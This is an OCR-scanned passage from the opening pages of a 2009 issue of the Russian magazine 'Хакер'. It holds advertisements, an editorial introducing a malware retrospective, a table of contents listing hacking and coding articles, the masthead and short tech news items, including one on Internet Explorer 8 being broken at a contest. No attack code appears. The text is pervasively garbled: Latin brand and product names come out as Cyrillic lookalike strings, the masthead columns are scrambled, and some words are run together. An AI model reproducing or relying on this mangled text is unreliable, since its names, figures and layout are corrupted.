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РЕРО СотриЪегз рекомендует ОС ХЛ/іпсІоѵѵг Ѵізіа® Вигіпезз 

ЭКСПЕРТАМ 
ОТ ЭКСПЕРТОВ 




Варианты исполнения корпусов 



Реклама. Товар сертифицирован. 



ОЕРО ІМеоз 630 — российский компьютер мирового уровня 



□ЕРО N608 630 на базе четырехъядерного процессора ІпЪеІ® Соге™2 (Зиасі с технологией ѵРго™ - 
представитель нового поколения корпоративных ПК, обеспечиающих исключительную производительность 
и реальную многозадачность для работы бизнес-приложений и поддерживающих интегрированные 
аппаратные функции управления и безопасности с использованием технологии ІпЪеІ® ѵРго™. 

• Процессор ІпЪеІ® Соге™ 2 ОиасІ 

• Подлинная ѴѴіпсІоѵѵз ѴізЪа® Вивіпевв 

• Объем оперативной памяти до 4 Гб 

• Объем дискового пространства до 1 Тб 

• Интегрированный графический адаптер или внешняя видеокарта 

• Возможности удаленного мониторинга и администрирования 

• Три варианта исполнения МісІіТоѵѵег, МіпіТоѵѵег, 8таІІ Рогт РасЪэг 

• Выбор конфигурации и размещение заказа на сайте 

• Производство под заказ в течение трех рабочих дней 



МЫ ИХ СДЕЛАЛИ! ДЛЯ ВАС! 

Компания йЕРО СотриЪегз, тел. (495) 969-22-22, ѵѵѵѵѵѵ.сІеросотриЪегг.ги 

Іпіеі, логотип ІпіеІ, Іпіеі Соге, ІпіеІ ѵРго, Соге Іпзісіе и ѵРго Іпзісіе являются товарными знаками корпорации Іпіеі в США и других странах. 




Защита. 

Управление. 






В 1 999 году Девиду Смиту хватило ста строк неис- 
кушенного кода, чтобы устроить мировую эпидемию, 
заразив Мелиссой десятки миллионов компьютеров. 
И хотя с тех пор все здорово поменялось, степень 
проникновения разнообразной мал вар и едва ли 
уменьшилась. Чего стоитхотя бы январский червь 
Ооѵѵпасіир, который до сих пор наводит страх на 
ѴѴіпсІоѵѵз-пользователей. Что уж говорить про разно- 
шерстный приватный софт для обустройства ботнетов 
и отжима денег с населения развитых стран. 

В этом месяце мы решили вспомнить, как развива- 



лась публичная вирусная индустрия и составили 
своеобразный рейтинг самых популярных мал варей 
за последние 1 0 лет. 



Іпікііог, глТ 



Р.5. На ши друзья-геймеры из игровыхжурналов 
Ѳатеіапсі решили замесить крутую акцию под кодо- 
вым названием «День Геймера». Если интересно — 
читай подробности на странице 4. 
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П 004МЕ6АЫЕѴѴ5 

Все новое за последний месяц 

О РЕРРЫМ 

016 ІЧовый ѴѴі-Рі 

Тест ОгзіХ N ѴѴі-Рі роутеров 

■ РС_2(ЖЕ 

020 10 ЗЛО-ВИРУСОВ 

Самая нашумевшая малварь 
за последние 1 0 лет 

026 НАВИГАЦИЯ БЕЗ ѲР5 

Как определить свои координаты 
по I Р, Ѳ5М/ІІМТ5 и ѴѴі-Рі 

030 КОГДА ТЫ СТАНЕШЬ СЛЕПЫМ 

Это только сейчас кажется, 
что здоровье будет всегда 

032 БАЗУ ДАННЫХ НЕ СТАЩИТЬ! 

Правильные способы защитить 
данные в таблицах БД 

П ВЗЛОМ 

038 ЕА5У НАСК 

Хакерские секреты простых вещей 

042 ОБЗОР ЭКСПЛОЙТОВ 

Свежие уязвимости от Сквоза 

048 МЕРЯЕМ УЯЗВИМОСТИ 

Классификаторы и метрики 
компьютерных брешей 

052 ѴѴ0Р0РКЕ55: 

ТЕСТ НА ПРОНИКНОВЕНИЕ 

Полный анализ малоизвестных 
уязвимостей раскрученного движка 

058 ИМПЛАНТАЦИЯ СІ5С0 

Модифицирование прошивки маршрутизатора 

064 ІРНОЫЕ ТЕРМИНАТОР 

Создаем автоматическое средство 
аудита Арріе іРЬопе 

070 Х-Т00І-5 

Программы для взлома 

■ СЦЕНА 

072 МЕДИА-МАГНАТЫ 

ПРОТИВ ВІТТОВВЕІМТ 

Судебный процесс по делу ТЬе Рігаіе Вау 



О юниксойд 

080 ОБРЕЧЕННЫЕ НА УСПЕХ 

Обзор самых интересных проектов, 
представленных на ІІІМІХ-конференциях 

084 ВСТРАИВАЕМ ПИНГВИНА 

Учимся ставить І_іпих на микроконтроллеры 

■ кодинг 

088 АТАКА НА МИСТЕРА ТВИТТЕРА 

Пишем скрипты для спама ТѵѵКіег на РуіЬоп’е 

094 ПИТОН ДЛЯ МАТЕРЫХ 
ХАРДКОРЩИКОВ 

Куем ассемблерные вставки 
в РуШоп с помощью кошерного СогеРу 

■ ФРИКИНГ 

098 ИНФРАКРАСНАЯ ЛЕНЬ 

Управлять с пульта можно 
не только телевизором 

102 ГРОМ И МОЛНИИ 

Эксперимент по передаче 
энергии на расстояние 

■ 5ѴЫ/АСК 

106 ЗА СЕМЬЮ ПЕЧАТЯМИ 

ѴѴіп2к8: средства и инструменты безопасности 

110 УЗНИК ТАЙНОЙ ТЮРЬМЫ 

Используем РгееБЭй За\1 

для изолирования небезопасных сервисов 

115 ЗВЕЗДНОЕ ПОПУРРИ 

Фокусничаем с ІР-РВХ Азіюгізк 

■ юниты 

120 ДЕНЬ ЗАВИСИМОСТИ (2009, ѴН5ШР) 

Полный ][-гайд по основным аддикциям 

124 РАОиЫІТЕО 

Большой РАО 

127 ДИСКО 

8,5 Гб всякой всячины 

128 ѴѴѴѴѴѴ2 

Удобные ѵѵеЬ-сервисы 




/РЕДАКЦИЯ 


/АКТ 


/ривизшыб 


> Горячая линия по подписке 


>Главный редактор 


>Арт-директор 


> Издатели 


тел.: 8(800)200.3.999 


Никита «пікііогг» Кислицин 


Евгений Новиков 


Рубен Кочарян 


Бесплатно для звонящих из России 


(пікіі 02 @геаІ. хакер, ги) 


(поѵікоѵ.е@датеІапсІ.ги) 


(поаІі@датеІапсІ.ги) 


> Для писем 


>Выпускающий редактор 


>Версталыцик 


>Учредитель 


101000, Москва, 


Николай«догІ»Андреев 


Вера Светлых 


ООО «Гейм Лэнд» 


Главпочтамт, а/я 652, Хакер 


(догІит@геаІ. хакер, ш) 


(зѵеІІуГі@датеІапсІ.ги) 


>Директор 


Зарегистрировано в Министерстве 




>Фото 


Дмитрий Агарунов 


Российской Федерации по делам печати, 


>Редакторы рубрик 


Иван Скориков 


(сІтіІгі@датеІапсІ.ги) 


телерадиовещанию и средствам массовых 


ВЗЛОМ 


/ХАКЕР, ки 


Управляющий директор 


коммуникаций ПИ Я 77-11802 от 14 


Дм итр и й«РогЬ» Докучаев 


Давид Шостак 


февраля 2002 г. 


ДогЬ@геаІ. хакер. ги) 


> Редактор сайта 


(зІіозІак@даітіеІапсІ.ги) 


Отпечатано в типографии 


РС_20ЫЕ и ІІІМІТ5 


Леонид Боголюбов 


>Директор по развитию 


«Біеіиѵаз Ріѵаз», Литва. 


Степан «зіер» Ильин 


(ха@геаІ. хакер, ги) 


Паша Романовский 


Тираж 100 000 экземпляров. 


(зІер@геаІ. хакер, ш) 


/РЕКЛАМА 


(готапоѵзкі@датеІапсІ.ги) 


Цена договорная. 


ІІЫІХОЮ, 5ѴІЧ\АСК и РБУСНО 


>Директор по персоналу 




Андрей «АпсІгизЬоск» Матвеев 


/Тел.: (495) 935-7034, факс: (495) 780-8824 


Михаил Степанов 


Мнение редакции не обязательно 


(апсІгизІіоск@геаІ. хакер, ги) 


>Директор группы 0АМЕ5 & 0І6ІТАІ. 


(зІерапоѵт@датеІапсІ.ги) 


совпадаете мнением авторов. Редакция 


КОДИНГ 


Евгения Горячева [догуасбеѵаѲдатеІапб. 


>Финансовый директор 


уведомляет: все материалы в номере 


Александр «Ог. Кіоипіг» Лозовский 


ги) 


Леонова Анастасия 


предоставляются как информация к 


(аІехапсІег@геаІ. хакер, ги) 


> Менеджеры 


(Іеопоѵа@датеІапсІ.ги) 


размышлению. Лица, использующие 


ФРИКИНГ 


Ольга Емельянцева 


>Редакционный директор 


данную информацию в противозаконных 


Сергей «ОІіпурДолин 


Мария Нестерова 


Дмитрий Ладыженский 


целях, могут быть привлечены к 


(сІІіпуі@геаІ.хакер.ги) 


Мария Николаенко 


(ІасІу 2 Ііепзкіу@датеІапсІ.ги) 


ответственности. Редакция в этих случаях 


>Литературный редактор 


Марина Румянцева 


>РР-менеджер 


ответственности не несет. 


Дмитрий Лященко 


Максим Соболев 


Наталья Литвиновская 




(ІуазНсНепко@датеІапсІ.ги) 


Администратор 


(ІіІѵіпоѵзкауа@датеІапсІ.ги) 


Редакция не несет ответственности за 


/иѵи 


Мария Бушева 


/ОПТОВАЯ ПРОДАЖА 


содержание рекламных объявлений в 


>Директор корпоративной группы 


номере. За перепечатку наших материалов 


>Выпускающий редактор 


(работа с рекламными агентствами) 


>Директор отдела 


без спроса — преследуем. 


Степан «Зіер» Ильин 


Лидия Стрекнева (зігекпеѵайдатеіапсі.ги) 


дистрибуции 




(зІер@геаІ. хакер, ги) 


> Старший менеджер 


Андрей Степанов 


Объединенная медиакомпания батеіапсі 


>Редактор ІІпіх-раздела 


Светлана Пинчук 


(апсІгеу@датеІапсІ.ги) 


предлагает партнерам лицензии и права на 


Антон «АпЕ» Жуков 


> Менеджеры 


>Связьс регионами 


использование контента журналов, дисков, 


>Редактор тематических подборок 


Надежда Гончарова 


Татьяна Кошелева 


сайтов и телеканала батеіапсі ТѴ. По всем 


Андрей Комаров 


Наталья Мистюкова 


(козІіеІеѵа@датеІапсІ.ги ) 


вопросам, связанным слицензированием 


(котагоѵ@датеІапсІ.ги) 


> Старший трафик-менеджер 


>Подписка 


и синдицированием обращаться по адресу 


>Монтаж видео 


Марья Алексеева (аІекзееѵаѲдатеІапсІ.ги) 


Марина Гончарова 


сопіепійдатеіапсі.ги. 


Максим Трубицын 




(допсНагоѵа@датеІапсІ.ги) 
тел.: (495)935.70.34 
факс: (495)780.88.24 
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ОБО ВСЕМ ЗА ПОСЛЕДНИЙ МЕСЯЦ 



МАРИЯ «МІРР1Ы.» НЕФЕДОВА / МІРтИ.<®КЕАІ..ХАКЕР.Ви / 



Новые дисплеи 
отЗатзипд 

Этой весной компания Затзипд порадует нас новой 
линейкой мониторов. В 50 серию войдут девять широко- 
форматников с диагоналями 20”, 21,5” и 23”. Технические 
характеристики таковы: время отклика 2 мс для всех 
моделей, кроме трех мониторов с аналоговым интерфей- 
сом, они будут немного медленнее — 5 мс; динамическая 
контрастность 50.000:1 ; яркость 300 кд/м2. Разрешение 
тоже порадует: 1200x900 — у трех младших моделей 
серии и 1920x1080 — у остальных. Благодаря техноло- 
гии МадісВгідЫЗ, настроить монитор под свои нужды не 
составит труда, — уже имеется шесть готовых профилей: 
«Текст», «Интернет», «Спорт», «Кино», «Игры», а также 
наличествует пользовательский режим. Дизайн серии 
отличается строгими линями, четкими углами, и даже 
кнопки управления выполнены в гладком сенсорном 
варианте. За счет сочетания угольно-черной рамки с кор- 
пусом цвета «черный гранат», 50 серия выглядит интерес- 
но и необычно. Увидеть ее своими глазами можно будет 
уже в апреле-мае, когда новинки доберутся до прилавков 
магазинов. 




День геймера 



ПО ОФИЦИАЛЬНОЙ СТАТИСТИКЕ АРРЬЕ, ІРНОЫЕ 
05УЖЕУСТАН0ВЛЕНАНА МИЛЛИОНАХ 
МОБИЛЬНЫХУСТРОЙСТВ. 



(дате)іапсі и «Эльдорадо» дарят всем 
российским геймерам профессиональный 
праздник — День Геймера! 25 и 26 апреля 
в пяти магазинах «Эльдорадо» в городе 
Москве можно будет с размахом отметить 
событие — ознакомиться с игровыми новин- 
ками, принять участие в различныхтурнирах 
по хитовым играм, приобрести игровую 
продукцию по специальным ценам и просто 
отлично провести время. Все подробности 
на сайте ѵѵѵѵѵѵ.даітіег-сііѵ.ги ! Не пропусти! 

В каждом из магазинов создана игровая 
зона. В демонстрационной части — новей- 
шие проекты для РС и ХЬох 360, в турнирной 
— поединки по самым популярным игровым 
дисциплинам, на сцене — зажигательные 
ведущий и ди-джей, которые будут подде- 
рживать и разогревать атмосферу праздни- 
ка. Помимо этого — веселые конкурсы, море 
призов, подарков и дружелюбная атмосфера. 
Приняв участие в турнире, все желающие 



становятся участниками Континенталь- 
ной Лиги — на официальном сайте будут 
публиковаться таблицы с рейтингами лучших 
игроков. Стань героем своей страны! Турниры 
будут проводиться по следующим дисципли- 
нам - каждый сможет найти себе достойных 
соперников: 

• Р.Е.А.Р. 2: Ргоіес* Огідіп(РС) 

• Саіі о* Ои*у: ѴѴогШ а* ѴѴаг(РС) 

• ѲРШ(РС) 

• Ѳеагз о* ѴѴаг 2 (ХЬох 360) 

• МогЫ КотЬа* ѵз. йС ІІпіѵегзе (ХЬох 360) 

Задать вопросы о мероприятии можно на 
форуме ѵѵѵѵѵѵ.аатеіапсі.ги в специально 
созданном разделе РАО. 



АДРЕСА МАГАЗИНОВ 
ПРОВЕДЕНИЯ АКЦИИ: 

•ЛЮБЛИНСКАЯ УЛ., Д. 153 , ТКЛ-153 
•РЯЗАНСКИЙ ПР. 2, ТК ГОРОД 
•БУТАКОВА Д.2.ТК ГРАНД 
•БАГРАТИОНОВСКИЙ ПРОЕЗД Д. 7, 
ТКГОРБУШКИН ДВОР 

•КИРОВОГРАДСКАЯ УЛ., Д. 13, ТККАРЕНФОР 



► 004 



ХАКЕР 04 /1 24/ 09 






25 и 26 апреля 5 магазинов «Эльдорадо» становятся территорией геймеров! 
Приходите, и вы сможете принять участие в уникальных игровых турнирах, 
выиграть суперпризы, своими глазами увидеть 
демонстрацию новейших игровых новинок и получить суперскидки на покупку 



І-одііесЬ 



«Эльдорадо» и батеіапсі совместно учреждают 

КОНТИНЕНТАЛЬНУЮ ИГРОВУЮ ЛИГУ. , 

Сразись за звание лучшего геймера в мире! | 



Генеральный спонсор 
Корпорация Іп(еІ 



в) БРАТИСЛАВСКАЯ 

м РЯЗАНСКИМ ПРОСПЕКТ 

(й РЕЧНОЙ ВОКЗАЛ 

( Ш БАГРАТИОНОВСКАЯ .. 
Ш ПРАЖСКАЯ 



. ул. Люблинская, д. 153 (ТК “Л-15?') - центр электроники “ЭКГ' 
Рязанский пр. . д. 2, к. 2 (ТЦ “ Город ") - центр электроники “ЭТО' 

ул. Бутакова, 4 (ТК “Гранд") • центр электроники “ЭТО" 

Багратионовский проезд, д.7, (ТЦ “ Горбушкин двор") 

ул. Кировоградская. 13 (ТЦ “ Каренфор ”) 



хеох збо 



т ад 



на правах рекламы 
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- Налог 
на контрафакт 

Есть на нашем голубом шарике совсем небольшое пятнышко — остров 
Мэн. Это местечко во всем мире известно как оффшорная зона и уни- 
кальнотем, что, являясь коронным владением Великобритании, не вхо- 
дит ни в состав самой Великобритании, ни в состав ЕС. И хотяживеттам 
всего 76.000 человек, эти люди довольно активно пользуются интерне- 
том (на острове есть целыхтри провайдера). Разумеется, жители Мэна, 
как и все прогрессивное человечество, пользуются файлообменниками, 
пиринговыми сетями, а стало быть, качают всяческий контрафакт. И пока 
в других странах юзеров за это показательно судят и штрафуют, советник 
правительства по электронному бизнесу Рон Берри предложил совер- 
шен ноиное решение— на острове введен смешной налог в размере 
одного фунта стерлингов, оплатить который можно даже с мобильного 
телефона. Из собранных с населения средств будут производиться офи- 
циальные отчисления музыкантам и звукозаписывающим компаниям. 
Кому именно и сколько платить, помогут определить провайдеры остро- 
ва, уже установившие у себя специальное оборудование, при помощи 
которого можно будетузнать, кто и какую конкретно музыку скачивал. 
Интересно, когда до подобных схем додумаются не только на Мэне?.. 





Русский магазин НР 



Цветной е-іпк 

Вот и появилось, наконец, в продаже первое устройство для чтения 
электронных книге цветным дисплеем. Пионер в сфере цветных риде- 
ров на базе электронной бумаги (что примечательно, используются не 
разработки компании Е-іпк, а собственная технология) носитимя ЕБЕРіа 
и стал детищем Ещіізи РгопІесЬ ЫтіѣесІ и Рщ’йзи ЕаЬогаІогіез ЕітБесІ. 
Экран девайса с диагональю 8" и разрешением 768х1024способен 
отображать 260.000 цветов. Однако радоваться рано — при работе «на 
полную мощность» устройству потребуется 8 секунд для прорисовки 
страницы, что переходит все разумные границы. При сокращении 
количества цветов до 4096 жутковатая цифра уменьшается до 5 секунд, а 
при 64 — достигает более-менее приемлемого показателя в 1 .8 секунды. 
Остальные характеристики тоже довольно необычны для ридеров: 
ѴѴіпсІоѵѵз СЕ5.0 ОС.тачскрин, поддержка ѴѴі-Рі ІЕЕЕ802.1 1 Ь/д и ВІиеІооШ 
Ѵег2.0+ЕОР, подключение к ПКчерез 115В, поддержка ЭБ-картдо 4 Гб. 
Аккумулятор, разумеется, менее «живуч» — выдерживает смену страниц 
2400 раз в 64-цветном режиме (для читалок в градациях серого этот 
показатель обычно равен 7000-9000 «перелистываний»). Цена девайса 
составляет$1015, и доступен он пока только в Японии. Остальным 
странам, традиционно, придется подождать. Притом — лучше ждать не 
ЕБЕРіа, а дальнейшего развития прогресса :). 

ИЗ-ЗА КРИЗИСА ДОЛЯ ПИРАТСКИХ 
БѴБ- И СБ-ДИСКОВ В ОБЩЕМ ОБЪЕМЕ 
ПРОДАЖУВЕЛИЧИЛАСЬНА 1 %. 



В начале марта в Москве, под 
крышей торгового комплекса 
«Горбушкин двор», открылся 




первый в России фирменный 
магазин компании НР. Выбор 
места вряд ли кого-то удивит, 
— «Горбушкин двор» один из 
крупнейших и наиболее посе- 
щаемых «электронных разва- 
лов» столицы. 

Магазин расположился в сек- 
торе «Ноутбуки», но, несмотря 
на это, представлены в нем не 
только ноуты, но и весь спектр 



продукции компании — от деск- 
топов до устройств печати. 
Бесспорными плюсами офи- 
циального магазина будут воз- 
можность приобрести товар с 
дополнительными гарантиями 
подлинности и качества, протес- 
тировать интересующие продук- 
ты или ознакомиться с «эксклю- 
зивными» и редкими моделями, 
а также проконсультироваться 



с ведущими специалистами, 
получив свежую и достоверную 
информацию. 

Дирекция НР делает обнадежи- 
вающие прогнозы — если про- 
ект окажется выгоден не только 
с имиджевых позиций, но и 
коммерчески, в других крупных 
городах тоже появятся офици- 
альные магазины. 



► 006 
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Зажги Олимпийский Огонь 

в Канаде! 



Участвуй в творческом конкурсе! 




ВСЕМИРНЫЙ ПАРТНЕР 

999 






Если тебе 1 
от 12 до 17 лет 
Собери не менее 
1 0 одноклассников 
Составьте коллективную 
творческую работу с рассказом о том, 
( почему именно ваш учитель физкультуры 
достоин стать участником 
Эстафеты Олимпийского Огня 
"Ванкувер - 2010 м . 

Творческие работы принимаются в период с 1 апреля по 31 мая 2009 г. 

по почте заказным письмом по адресу: 
Москва, 1 21 1 08, ул. И. Франко д. 8, 1 6 эт., Соса-Соіа 
или электронной почтой по адресу: 
сосасоіагаеиг.ко.сот с пометкой «Конкурс». 

Экспертное жюри рассмотрит все конкурсные работы 
в период с 1 по 10 июня 2009 года 
и определит самого достойного учителя физкультуры России. 



Дополнительную информацию по конкурсу 
вы сможете получить по тел.: 8 800 200 22 22 і 
Звонок бесплатный. У 



Соса-Соіа и контурная бутылка являются зарегистрированными товарными знаками ТЬе Соса-Соіа Сотрапу. 

© 2009 ТЬе Соса-Соіа Сотрапу. Напиток сертифицирован. 
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Аварийная 
кнопка от бтаіі 



Сколько раз засвою жизнь, 
написав и отправив е- та і I, ты 
жалел о содеянном? Все мы по- 
рой можем наговорить лишнего 
банально ошибиться адресом 
или забыть упомянуть что-то 
важное... И, разумеется, осоз- 
наем это только после нажатия 
кнопки «5епсІ» (закон подлости 
во всей красе!]. Но, оказывает- 
ся, от этого страдают не только 
юзеры, но и сами разработчики. 
Во всяком случае, разработ- 



чики боодіе точно. Ведьэто их 
усилиями у бтаіі появилась 
новая функция — «ипбо зепі», 
то есть «отменить отправку». 
Такое предложение теперь 
появляется после нажатия 
кнопки «Отправить». Система 
втечениеб секунд придержи- 
вает письмо, давая нам шанс 
передумать. Определенно — не 
самая бесполезная опция, 
правда, 5-секундная задержка 
это, все же, маловато. 



СОГЛАСНО СТАТИСТИКЕ ЛѴѴІРЕ, 
РОССИЯ НАХОДИТСЯ НА 8 МЕСТЕ В 
МИРЕ ПО КОЛИЧЕСТВУ ѴѴІ-РІ ТОЧЕК. 

Халява р сэр! 





На дворе мировой финансовый 
кризис, но, похоже, британцев он 
мало волнует. Недавно у одного из 
крупнейших британских пос- 
тавщиков кн и г для Аплагоп.сот 
истекла аренда склада (видимо, 
«внезапно», каконо всегда быва- 
ет]. Товартам лежал не слишком 
ходовой, и хозяева попросту 
от него отказались. В итоге, на 
руках у владельцев помещения 
остался огромный ангар, забитый 
миллионами букинистических 
книг, которые нужно было как-то, 
куда-то вывозить. Возвращать их в 
издательства вышло бы слишком 
накладно, и решено было сделать 



ход конем. Территорию Вгізіоі 
ВоокЬагп объявили территори- 
ей халявы, открыв двери всем 
желающим. Люди приходили и 
приезжали к складу, чтобы поко- 
паться в завалах и забрать столько 
книг, сколько смогутунести (а 
некоторым удавалосьуносить до 
1 БОтомов за раз]. Склад «зачис- 
тили» на ура, книги отправились 
в добрые руки, и справедливость 
восторжествовала. Но непонятно 
другое — что подвигло Атагоп. 
сот на такую щедрость, и с каких 
пор крупнейший е-шоп разбрасы- 
вается товаром и так относится к 
книгам. 



ІЕ 8. Релиз 



Компания МісгозоЛ, наконец-то, 
выпустила финальную версию 
Іпіегпеі Ехр1огег8. Произошло это 
1 9 марта, а уже 20-го браузер пер- 
вый раз сломали :). На конферен- 
ции РѴѴЫ20ѴѴІМ, организованной 
компанией ЗСот, устроили соот- 
ветствующий конкурс. В ходе него 
немец под ником ІЧіІз, используя 
собственный эксплойт под ІЕ7, 
без проблем проникна машинус 
последней сборкой ѴѴі псіоѵѵз 7 и 
ІЕ8 и похитил оттуда указанный 
организаторами файл. На все про 
все у парня ушло порядка пяти 
минут. За взлом ІЧіІз’у торжест- 



венно вручили 5000долларов и 
новенький Зопу Ѵаіо, а детальное 
описание хака и эксплойт от- 
правились прямиком в Місгозоіі: 
Зесигііу Везеагсб Сепіег. 

В целом, новая версия браузера 
не несетв себе ничего револю- 
ционного, хотя ІЕ8 определенно 
стабильнее своих предшест- 
венников. Теперь браузер умеет 
закрывать отдельные зависшие 
вкладки (по образу и подобию 
Соодіе СЬгот], обладает функци- 
ей анонимного серфинга ІпРгіѵаІе 
и оснащен защитой от фишинга 
ЗтагіЗсгееп. 




► 008 
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В Пентагоне 
тоже любят 5сИі 



Кто бы мог подумать, что об- 
разное выражение «стрельба 
из пушки по воробьям» станет 
реальностью. Стрелять, правда, 
собираются не по воробьям, а по 
комарам, и пушка будетлазер- 
ная. Такая гениальная мысль 
пришла в голову американским 
ученым, во времена холодной 
войны работавшим над созда- 
нием лазерной ПРО. Холодная 
война давно миновала, ценные 
мощности простаивают без дела, 
а от них, оказывается, может быть 
и совсем другой прок. Установки 
можно переориентировать на 
борьбу с насекомыми — заставить 
сжигать полчища кровососов, 



внеся большой вклад в борьбу с 
малярией и другими болезнями, 
переносимыми комарами. Стоит 
заметить, что тут не обошлось без 
Билла Гейтса, который вложил в 
научные проекты, направленные 
на борьбу с малярией, миллионы, 
и совсем недавно пугал кома- 
рами из банки слушателей на 
конференции ТЕО. Теперь пушки, 
стоящие вблизи городов, плани- 
руют«научить» различать писк 
самцов и самок комара, а также 
отличать его отзвуков, издава- 
емыхдругими насекомыми. Все 
поклонники фантастики ликуют, 
а параноики за паса ют тушенку и 
боеприпасы. 
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Киборги 
нашего времени 



Наука и прогресс пока недошли до того, 
чтобы спокойно имплантировать в тело 
человека разные интересные штуки 
(кардиостимуляторы не в счет!]. Ну, а раз 
полного «Обоз* іп Же збеіі» пока не видать, 
п риходится п ридум ы вать что-то поп роще 
исвоимисилами. Финский программер 
Джерри Ялава после автоаварии лишился 
пальца на руке, ноунывал недолго. Получив 



протез, он самостоятельно оснастил его 
встроенной флешкой на 2 Гб. Теперь, чтобы 
воспользоваться протезом не по прямому 
назначению, достаточно сдвинуть ноготь 
искусственного пальца — и можно вставлять 
флешку в ІЭЗВ-порт. На достигнутом Ялава 
останавливать не собирается, уже планируя 
версию 2.0 — со съемной фалангой и боль- 
шей емкостью накопителя. 



Больше нетбуков, 
хороших и разных 

Входе СеВІТ 2009 компания бідаЬуІеТесНпоІоду продемонстрировала 
публике ряд нетбуков, в число которых затесались любопытные модели — 
ТоисЬ ІМоІе М 1 028 и ВооІФор М 1 022. Первый нетбук интересен своим 10.1 ” 
сенсорным экраном — что, по сути, превращаетего в гибрид планшетного 
ПКс ноутом. Экран крепится к корпусу специальным шарниром, за счет ко- 
торого можетповорачиваться, и имеет разрешение 1024x600 или 1366x768 
точек. Производитель также сообщает, что девайс поддерживаетѴѴі-Рі, 
ВІиеІюоЖ и оснащен слотом для Ехргезз СагсІ. Остальные характеристики 
пока не разглашаются. Вторая модель — ВооІФор М 1 022 — будет комплек- 
товаться док-станцией, с которой нетбук сможет подзаряжаться и легким 
движением руки превращаться вдесктоп. Подробныххарактеристикдля 
этой модели тоже пока нет, известна лишь диагональ экрана — 10.1” и тот 
факт, что устройство будет поддержи вать стандарт 3.56, благодаря модулю 
НЭБРАна борту. 
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С0Р5А ОРС 






КЛИКНИ НА ГАЗ! 



оп-Ііпе гонки на ѵѵѵѵѵѵ.тахнгасіпд.ги 



/////Л\-Р\НЕ. 



представляет оп-!іпе игру 





Многочисленные призы 

от АІріОЁ 



Мах! Каопд - это виртуальный мир гонок на твоем компьютере! 

Хочешь обладать самым крутым гоночным автомобилем? Значит - Махі Пасіпд для тебя! 

В игре у тебя есть возможность купить авто, доработать его по полной и продать дороже, 
а на вырученные деньги купить новую тачку, ещё круче. Но самое главное: побеждаешь в 
игре - побеждаешь в реальности! Каждый месяц новые призы! Ты можешь выиграть 
компоненты Саг Аибіо & МоЬіІе Мебіа от Аіріпе, страховку РОСНО на свое аето, 

А в конце года лучший получит реальный автомобиль - ОреІ Согза! 



МАХ! вдаие* ИГРАЙ И ВЫИГРЫВАЙ! 

Все подробности игры на сайте ѵѵѵѵѵѵ.тахі-гасіпд.ги и ѵѵѵѵѵѵ.тахкипіпд.ги 



а 

а. 



РОСНО 



і4 



в составе АПІапг ® 







^ тедапеѵг 
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РАЫ0А5ЕСУРІТУ СООБЩАЕТ: БОЛЕЕ 1 О МЛН. КОМПЬЮТЕРОВ В МИРЕ 
ЗАРАЖЕНЫ ВРЕДОНОСНЫМ ПО, ОРИЕНТИРОВАННЫМ НА КРАЖУ 
ФИНАНСОВОЙ ИНФОРМАЦИИ. 
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ІВМ + 51Ж = ? 



Интересную информацию распространило издание ТЬе ѴѴа II ЗігееЫоигпаІ. 

Ссылаясь на конфиденциальный источник, журнал сообщил, что корпорация I В М 
ведет переговоры о покупке компании 5ип Місгозузіетз, пользуясь сложившимися 
условиями финансового кризиса. Болеетого, источникутверждает, что сделка может 
состояться совсем скоро и называет минимальную сумму, фигурирующую в перего- 
ворах — 6.5 млрд, долларов. Если информация подтвердится, то это приобретение 
станет крупнейшим за всю историю ІВМ и поможетей укрепить свое положение на 
рынке в нынешнее, не слишком благополучное, время. 



Ноутбуксхарактером 

суперкара 

Крупные компьютерные выставки — это всегда множество 
новостей и интересных новинок, и прошедшая в Ганно- 
вере СеВІТ 2009 не стала исключением. Компания Азиз 
презентовала на выставке ноутбук Азиз-ЕатЬогдЫпі ѴХ5, на 
создание которого инженеров Азиз вдохновил автомобиль 
ЕатЬогдЫпі Неѵепіюп. Младшего брата шикарного авто от- 
личает не только футуристический и оригинальный дизайн, 
но и очень внушительные характеристики. «Под капотом» 
ноутбука расположатся процессор Соге2 ОиасІ, 4 Гб ОЗУ и 
550-накопитель объемом 1 терабайт. Да-да, это не опечат- 
ка, Ѵх5 будет самым «вместительным» ноутбуком в мире, 
большего накопителя пока нетниу кого. Прибавим кэтому 
16” экран с поддержкой ГиГ-НО, дискретную видеокарту 
ІМѴЮІАОеГогсе ОТ 130М с 1 Гб СБИРЗ ѴРАМ, и оптический 
комбо-привод с поддержкой Віи-гау. Если тебе все еще 
недостаточно мощностей, то заметим, что ноутбук может 
работать в режимеТѵѵіпТигбо, по сути, разгоняющем ЦП и 
ГП. Одним словом, ценителям стильных и мощных ноутбуков 
эта модель настоятельно рекомендуется. 



Окна, по данным компании бесішіа, в ріверох было 

но не ѴѴіпсіоѵѵб обнаружено 115 УЯЗВИМОСТЕЙ, ЧТО В 4 РАЗА 

Свой вклад в приближениетехнического БОЛЫ1ІЕ, Ч ЕМ Л ЮБОМ Д РУ ПОМ БРАУЗЕРЕ. 

прогресса кпростым людям внесла 
компания РЫШрз, представив работаю- 
щий прототип окна сОГЕО-подсветкой. 

Специалисты исследовательского под- 
разделения РЫШрз не один год трудились 
над созданием прозрачныхоргани- 
ческих светодиодов (ОГЕО), которые 
м ожн о б ы л о б ы за п и хнугь м ежду сл оя м и 
пластика ил и стекла, создав обычное на 
первый взглядокно, способное втемное 
время суток излучать свет. До появления 
технологии ОШЕОэто было невозможно, 
но сейчас дело дошлоуже до работающих 
образцов. Теперьосновные проблемы 
заключаются втом, что массовое произ- 
водство слишком дорого, для создания 
гото выхоконтре бу етс я « ч и ста я ко м н а та » , 
да и цена готовых продуктов выходит за 
разумные пределы. Траблы планируют 
решитьуже в течение ближайшихлет, 
обеспечив человечество новым, ориги- 
нальным источником света. 




► 012 
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Облава на корсаров 

Никто, в общем-то, не сомневался, что пираты тоже оценят новые 
возможности В Іи -гау дисков, но в России задержали партию такого 
контрафакта впервые. Отличилась, конечно, Москва, где сотрудни- 
ки ГУВД изъяли с двух складов более миллиона подделок, пример- 
ная стоимость которых оценивается в 100 млн. рублей. Что интерес- 
но, пираты, оказывается, используют мощности В Іи -гау как-то не 
слишком рационально. В основном на дисках записаны «экранки» 
последних новинок киноиндустрии в формате ОѴО-видео, или вооб- 
ще в .аѵі. Разумеется, посмотреть такие диски на Віи-гау аппаратуре 
не выйдет, только на компьютере. Однако розничная стоимость 
такого диска составляла порядка 1 000 рублей, учитывая, что лицен- 
зионный В Іи -гау диск стоит 1500 деревянных. Видимо, тяга к халяве 
и сборникам «100 в 1» в России неискоренимы. 








. ѲгеепРоѵ/ег эффективность 
